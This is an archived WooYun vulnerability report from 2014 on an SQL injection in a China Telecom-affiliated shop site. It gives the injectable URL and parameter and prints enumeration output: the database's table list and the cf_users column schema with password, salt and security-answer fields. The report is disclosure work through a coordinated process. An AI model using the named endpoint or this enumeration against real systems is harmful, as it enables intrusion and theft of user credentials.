当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078586

漏洞标题:电信某站SQL注入漏洞可影响敏感数据

相关厂商:中国电信

漏洞作者: 老和尚

提交时间:2014-10-08 10:04

修复时间:2014-11-22 10:06

公开时间:2014-11-22 10:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-08: 细节已通知厂商并且等待厂商处理中
2014-10-11: 厂商已经确认,细节仅向厂商公开
2014-10-21: 细节向核心白帽子及相关领域专家公开
2014-10-31: 细节向普通白帽子公开
2014-11-10: 细节向实习白帽子公开
2014-11-22: 细节向公众公开

简要描述:

又是电信了、

详细说明:

url:
http://www.gd189fq.com/new/ordersuc.php?&orderid=956

QQ图片20140407221117.png


漏洞证明:

Database: newcfshop
[93 tables]
+------------------------+
| cf_account_log |
| cf_ad |
| cf_ad_custom |
| cf_ad_position |
| cf_admin_action |
| cf_admin_log |
| cf_admin_message |
| cf_admin_user |
| cf_adsense |
| cf_affiliate_log |
| cf_agency |
| cf_area_region |
| cf_article |
| cf_article_cat |
| cf_attribute |
| cf_auction_log |
| cf_auto_manage |
| cf_back_goods |
| cf_back_order |
| cf_bonus_type |
| cf_booking_goods |
| cf_brand |
| cf_card |
| cf_cart |
| cf_cat_recommend |
| cf_category |
| cf_collect_goods |
| cf_comment |
| cf_crons |
| cf_delivery_goods |
| cf_delivery_order |
| cf_email_list |
| cf_email_sendlist |
| cf_error_log |
| cf_exchange_goods |
| cf_favourable_activity |
| cf_feedback |
| cf_friend_link |
| cf_goods |
| cf_goods_activity |
| cf_goods_article |
| cf_goods_attr |
| cf_goods_cat |
| cf_goods_gallery |
| cf_goods_type |
| cf_group_goods |
| cf_keywords |
| cf_link_goods |
| cf_mail_templates |
| cf_member_price |
| cf_nav |
| cf_order |
| cf_order_action |
| cf_order_goods |
| cf_order_info |
| cf_ordertagcount |
| cf_pack |
| cf_package |
| cf_package_goods |
| cf_package_link |
| cf_pay_log |
| cf_payment |
| cf_plugins |
| cf_products |
| cf_reg_extend_info |
| cf_reg_fields |
| cf_region |
| cf_role |
| cf_salecount |
| cf_searchengine |
| cf_sessions |
| cf_sessions_data |
| cf_shipping |
| cf_shipping_area |
| cf_shop_config |
| cf_snatch_log |
| cf_stats |
| cf_suppliers |
| cf_tag |
| cf_template |
| cf_topic |
| cf_user_account |
| cf_user_address |
| cf_user_bonus |
| cf_user_feed |
| cf_user_rank |
| cf_users |
| cf_virtual_card |
| cf_volume_price |
| cf_vote |
| cf_vote_log |
| cf_vote_option |
| cf_wholesale |
+------------------------+
--
Database: newcfshop
Table: cf_users
[34 columns]
+-----------------+------------------------+
| Column | Type |
+-----------------+------------------------+
| address_id | mediumint(8) unsigned |
| alias | varchar(60) |
| answer | varchar(255) |
| birthday | date |
| credit_line | decimal(10,2) unsigned |
| ec_salt | varchar(10) |
| email | varchar(60) |
| flag | tinyint(3) unsigned |
| frozen_money | decimal(10,2) |
| home_phone | varchar(20) |
| is_special | tinyint(3) unsigned |
| is_validated | tinyint(3) unsigned |
| last_ip | varchar(15) |
| last_login | int(11) unsigned |
| last_time | datetime |
| mobile_phone | varchar(20) |
| msn | varchar(60) |
| office_phone | varchar(20) |
| parent_id | mediumint(9) |
| passwd_answer | varchar(255) |
| passwd_question | varchar(50) |
| password | varchar(32) |
| pay_points | int(10) unsigned |
| qq | varchar(20) |
| question | varchar(255) |
| rank_points | int(10) unsigned |
| reg_time | int(10) unsigned |
| salt | varchar(10) |
| sex | tinyint(1) unsigned |
| user_id | mediumint(8) unsigned |
| user_money | decimal(10,2) |
| user_name | varchar(60) |
| user_rank | tinyint(3) unsigned |
| visit_count | smallint(5) unsigned |
+-----------------+------------------------+

修复方案:

这,你猜,我来讨礼物的

版权声明:转载请注明来源 老和尚@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-10-11 17:20

厂商回复:

最新状态:

暂无